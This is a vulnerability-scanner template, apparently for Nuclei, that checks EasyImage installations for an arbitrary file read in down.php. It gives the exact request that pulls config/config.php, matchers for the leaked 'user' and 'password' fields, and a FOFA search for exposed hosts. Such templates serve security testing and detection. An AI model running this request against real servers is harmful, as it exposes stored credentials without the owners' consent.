2023-08-06 07:21:26 +00:00
|
|
|
id: easyimage-downphp-lfi
|
|
|
|
|
|
|
|
info:
|
2023-08-07 14:23:09 +00:00
|
|
|
name: EasyImage down.php - Arbitrary File Read
|
2023-08-06 07:21:26 +00:00
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: high
|
|
|
|
reference:
|
|
|
|
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
|
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
verified: true
|
|
|
|
fofa-query: app="EasyImage-简单图床"
|
|
|
|
tags: easyimage,lfi,exposure,config
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/application/down.php?dw=config/config.php"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "'user'=>"
|
|
|
|
- "'password'=>"
|
|
|
|
- "EasyImage"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'text/html'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|